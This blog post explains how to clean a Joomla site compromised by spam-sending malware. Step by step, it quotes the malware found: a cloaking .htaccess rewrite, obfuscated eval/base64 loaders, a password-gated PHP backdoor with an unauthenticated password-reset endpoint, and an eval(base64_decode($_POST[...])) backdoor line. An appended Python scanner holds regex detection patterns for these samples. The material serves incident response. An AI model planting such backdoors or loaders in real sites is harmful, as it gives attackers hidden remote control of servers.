Thursday 5 June 2014

To recover a hacked Joomla Website attacked by Malware

If you are using Joomla (particularly Joomla 2.5.20 or lower) and your website has been hacked and is sending lots of spam emails from your server, then there may be hidden code left on your web server by malware.

Please find the list of things which need checking below:

1. Check the .htaccess file (if you have one) for anything unusual, such as the script below:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/sitename/public_html//common.php -f
RewriteRule ^.*$    /common.php [L]
</IfModule>
Just remove the above script, or alternatively replace the .htaccess file with the standard Joomla .htaccess file.

2. Look for any common.php file in the root folder. If you are not sure about it, check whether you see something like the below in that file; if so, just delete it.

$PXyCcfGZONUJafapZKpDwrnNv='ba'.'se64_d'.'ecod'.'e';
eval($PXyCcfGZONUJafapZKpDwrnNv("cHJlZ19yZXBsYWNlKCIvQ1JOVjNDQzhOSFNiQ3JWdHNEQkZtRGJlaS9lIiwgIkp3PWVScG1CdHNIM........."));


3. Search for any ajax.php file in any folder and, if found, check whether you see something like the below in that file. If found, just delete it.

$x74="+HM)?Z\"Yb&eny`{BPX^(=3}DT@q-m#9;UwI_[]8p/a~sE4zvW:%7*AdF0\r GruLfh>1cl!Vgt<.RQKJx6i\t5o|\\CN\$O\n,'2Skj"; 
$GLOBALS['utxje85'] = $x74[10].$x74[60].$x74[60].$x74[84].$x74[60].$x74[35].$x74[60].$x74[10]
.......
.......;

4. Similarly, search for any smile.php file in any folder and, if found, check whether you see something like the below in that file. If found, just delete it.

eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIo...........
.......
.......)));

5. Further, search in any folder for any file containing the script below (particularly update.php). If found, just delete that script and make sure the file has the right contents.

if(!empty($_GET['action']) && $_GET['action'] == 'set_password' && !empty($_GET['hashed_password'])) {
    // Unauthenticated: anyone can overwrite the shell password via a GET request
    $hashed_password = $_GET['hashed_password'];
    $fh = fopen(PASSWORD_FILE, "w");
    if($fh==false) die("unable to create file");
    fputs ($fh, $hashed_password);
    fclose ($fh);
    exit;
}

if(!file_exists(PASSWORD_FILE)) {
    // First run: write a default password hash (the same string shown in the p.txt sample in step 6)
    $hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';
    $fh = fopen(PASSWORD_FILE, "w");
    if($fh==false) die("unable to create file");
    fputs ($fh, $hashed_password);
    fclose ($fh);
}
else {
    $hashed_password = trim(file_get_contents(PASSWORD_FILE));
}

define('SHELL_PASSWORD', $hashed_password);
define('MAX_UP_LEVELS', 10);

// Show a password prompt unless a valid password cookie or POST value is present
if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
    print '<form method="post">
Password : <input name="password" type="text" /> <input type="submit" /></form>
';
}

// Correct password: store the hash in a cookie for 24 hours and reload the page
if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
    setcookie('password', SHELL_PASSWORD, time() + 60*60*24);
    header("Location: {$_SERVER['PHP_SELF']}");
    exit;
}

// Without the cookie the request stops here; with it, the real Joomla code below runs
if(empty($_COOKIE) || $_COOKIE['password'] != SHELL_PASSWORD) {
    exit;
}

// Actual Joomla code starts from here....
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);
....
....

6. Moreover, search for a p.txt file and, if you find it and it contains only an encrypted-looking string like the sample below, delete that file as well:
// sample encrypted code
a6a8cb877ee18215f2c0fc2a6c7b4f2a

7. Also, search for eval(base64_decode($_POST[' across all files. Any occurrence was put there by the malware, so delete that line of code from every file where it is found. Normally the code below is added at the very top or very bottom of the file:
eval(base64_decode($_POST['n26712b']));

8. Lastly, search for all error_log files across all folders and delete any that you reckon should not be there.

Going through all the above steps is quite painful and time consuming, but you can simply search for any of the above scripts, or anything with a similar pattern, and trash them all. Just beware that the targeted file names may sometimes be different.
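As an added example (not from the original post), a small Python scanner that automates that search over a Joomla webroot using the indicators from the steps above; the labels, the regexes and the constructed sample tree (harmless stand-ins, not real malware) are assumptions of the example.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the clean-up steps in the post above.
SUSPECT_NAMES = {"common.php", "ajax.php", "smile.php", "p.txt", "error_log"}
CONTENT_PATTERNS = [
    ("htaccess rewrite to common.php", re.compile(r"RewriteRule\s+\S+\s+/common\.php", re.I)),
    ("eval(base64_decode($_POST[..])) backdoor", re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_POST\[")),
    ("eval(gzinflate(base64_decode(..))) blob", re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(")),
    ("password-gated shell in Joomla file", re.compile(r"define\s*\(\s*'SHELL_PASSWORD'")),
]
CONCAT_RUN = re.compile(r"'[^'\\]*'(?:\s*\.\s*'[^'\\]*')+")  # e.g. 'ba'.'se64_d'.'ecod'.'e'

def concat_hides_decoder(text):
    # Join each run of concatenated string fragments; the obfuscated step-2 sample spells out base64_decode
    return any("base64_decode" in "".join(re.findall(r"'([^'\\]*)'", m.group(0)))
               for m in CONCAT_RUN.finditer(text))

def scan_file(path):
    # Indicator labels found in one file (empty list means nothing matched)
    text = path.read_text(encoding="utf-8", errors="replace")
    hits = ["suspect file name"] if path.name in SUSPECT_NAMES else []
    hits += [label for label, pat in CONTENT_PATTERNS if pat.search(text)]
    if concat_hides_decoder(text):
        hits.append("base64_decode assembled from string fragments")
    return hits

def scan_webroot(root):
    # Walk a webroot; return {relative posix path: [labels]} for every flagged file
    found = ((p.relative_to(root).as_posix(), scan_file(p)) for p in Path(root).rglob("*") if p.is_file())
    return {rel: hits for rel, hits in found if hits}

def build_sample_webroot():
    # Constructed sample tree mimicking the post's findings; harmless stand-ins, not real malware
    root = Path(tempfile.mkdtemp())
    samples = {
        ".htaccess": "RewriteEngine On\nRewriteRule ^.*$ /common.php [L]\n",
        "common.php": "<?php $f='ba'.'se64_d'.'ecod'.'e'; echo $f('aGVsbG8=');\n",
        "libraries/update.php": "<?php define('SHELL_PASSWORD', $hashed_password);\n",
        "index.php": "<?php define('_JEXEC', 1); // clean Joomla entry point\n",
    }
    for rel, body in samples.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root

if __name__ == "__main__":
    for rel, labels in sorted(scan_webroot(build_sample_webroot()).items()):
        print(rel, "->", ", ".join(labels))
```

Point it at a real webroot with scan_webroot("/path/to/public_html") and review each flagged file by hand before deleting anything, since a clean file can legitimately contain base64_decode.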

If you have found anything different from what is mentioned above, and you have a solution, please comment on this article so that it will be helpful to others.
